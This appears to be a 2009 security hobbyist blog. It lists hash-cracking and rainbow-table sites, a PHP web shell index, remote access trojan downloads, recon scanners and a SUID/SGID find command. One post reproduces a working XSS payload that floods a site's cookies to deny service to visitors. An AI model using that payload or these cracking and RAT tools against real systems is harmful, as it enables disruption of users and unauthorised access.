http://passwordsecuritycenter.com/in…roducts_ id=7
http://0ptix.co.nr/md5
https://www.astalavista.net/?cmd=rainbowtables
http://ice.breaker.free.fr/
http://www.md5this.com
http://www.pldsecurity.de/forum/md5.php
http://www.xeons.net/genesis/
http://hackerscity.free.fr/
http://bisix.cogia.net/
http://md5.allfact.info/
http://bokehman.com/cracker/
http://www.tydal.nu/article/md5-crack/
http://ivdb.org/search/md5/
http://md5.netsons.org/
http://md5.c.la/
http://www.jock-security.com/md5_database/?page=crack
http://c4p-sl0ck.dyndns.org/cracker.php
http://www.blackfiresecurity.com/tools/md5lib.php
http://www.md5-db.com/index.php

md4:
http://www.securitystats.com/tools/hashcrack.php
http://rainbowtables.net/services/results.php
http://rainbowcrack.com/

sha1:
http://passcrack.spb.ru/
http://www.hashreverse.com/
http://rainbowcrack.com/
http://www.md5encryption.com/
http://www.shalookup.com/
http://md5.rednoize.com/
http://c4p-sl0ck.dyndns.org/cracker.php
http://www.tmto.org/


Misc:
http://linardy.com/md5.php
http://www.gdataonline.com/seekhash.php
https://www.w4ck1ng.com/cracker/
http://search.cpan.org/~blwood/Digest-MD5-Reverse-1.3/
http://www.hashchecker.com/index.php?_sls=search_hash
http://www.rainbowcrack-online.com/
http://schwett.com/md5/
http://www.md5.org.cn/index_en.htm
http://www.xmd5.org/index_en.htm
http://nz.md5.crysm.net/
http://us.md5.crysm.net/
http://gdataonline.com/seekhash.php
http://passcracking.ru/
http://shm.pl/md5/
http://www.neeao.com/md5/
http://md5.benramsey.com/
http://www.md5decrypt.com/
http://md5.khrone.pl/
http://www.csthis.com/md5/index.php
http://www.md5decrypter.com/
http://www.md5encryption.com/
http://www.md5database.net/
http://md5.xpzone.de/
http://www.hashreverse.com/
http://alimamed.pp.ru/md5/
http://md5crack.it-helpnet.de/index.php?op=add
http://shm.hard-core.pl/md5/
http://rainbowcrack.com/
http://passwordsecuritycenter.com/index.ph…p;products_id=7
https://www.astalavista.net/?cmd=rainbowtables
http://ice.breaker.free.fr/
http://www.md5this.com/
http://hackerscity.free.fr/
http://md5.allfact.info/
http://bokehman.com/cracker/
http://www.tydal.nu/article/md5-crack/
http://passcracking.com/
http://ivdb.org/search/md5/
http://md5.netsons.org/
http://md5.c.la/
http://www.md5-db.com/index.php
http://md5.idiobase.de/
http://md5search.deerme.org/
http://sha1search.com/

User Profile Deletion Utility

Index of PHP Shells

REVIEW THE CODE BEFORE USING ANY WEB SHELL!!

http://blacknite.eu/php_shells/


Thursday, May 14, 2009

Finding SUID/SGID root programs

Source: http://www.faqs.org/docs/securing/chap5sec62.html

EDIT: It doesn't look like it, but it's all one line:
find / -type f \( -perm -04000 -o -perm -02000 \) \-exec ls -lg {} \;


Wednesday, May 13, 2009

WIGS - Website Information Gathering Scanner

A TON of information, in one click without touching the site yourself.. ;-)

http://sucuri.net/index.php?page=scan

Also, my other favorite is: http://www.serversniff.net/



Tuesday, May 12, 2009

List of x86 Instructions

Don't Censor Me!

LeetUpload.com

An awesome repository of interesting do-dads and toys for hackers / security 'pros'

Proceed with caution. There are pointy objects ahead:
http://www.leetupload.com/

"Official" Metasploit Documentation

Hex Editor - Frhed

I've been searching for a free hex editor that had the features I need and the search is finally over.

http://frhed.sourceforge.net/

Thanks @marcusjcarey


Sunday, May 10, 2009

XSS based Client-side DoS

Makes the client's cookie for the site per subdomain 200kb.
http://pastebin.com/f3dfe04f7

/*<script>/*code to create a 200KB of cookies per subdomain*/with(document)domain.replace(/[^.]*\.?/g,function(a){try{domain=domain.replace(a,"")}catch(e){a=""}finally{for(i=0;i<50;i++)cookie=i+"="+Array(4095)+";expires=9 Jan 2038 23:59 GMT;path=/;domain=."+a+domain}})//</script>

I pasted the code in case it gets lost on Pastebin

Fravia's Swansong

Saturday, May 9, 2009

This is why you're fat

Not security related, but hilarious. Come on, who hasn't had a Choco Taco.
http://thisiswhyyourefat.com

Sunday, May 3, 2009

Stock Photo Sites

Links to 16 of them. Why is this good for you? It will help with those presentations you have to give:
http://www.softalize.com/2009/04/14/16-ultimate-collection-of-free-stock-photo-sites/

ErrMess

Another really fun RAT to play with: http://www.errmess.com/

Megapanzer

RAT, and some interesting history dumping ;-)

http://www.megapanzer.com/source-code/

Saturday, April 18, 2009

Web Sniffer

Good site for recon without touching the host:

http://web-sniffer.net



Wednesday, March 25, 2009

SQL Injection Not Just 1=1 Slides

Good slide deck on SQLMap - one of those greatly underestimated tools:

Cracking passwords with Wikipedia

Sebastien Raveau shares his secret with cracking passwords using not the dictionary, but Wikipeda. Combine this with the wordlist based rainbow tables and you have quite the effective cracking machine.
Tricks of the Trade: Cracking passwords with Wikipedia, Wiktionary, Wikibooks etc

You can find Sebastien on Twitter: @sraveau



Saturday, March 21, 2009

How to present while people are twittering

Not technical but a very good article for presenters in this twitter/socmed age:
http://pistachioconsulting.com/twitter-presentations/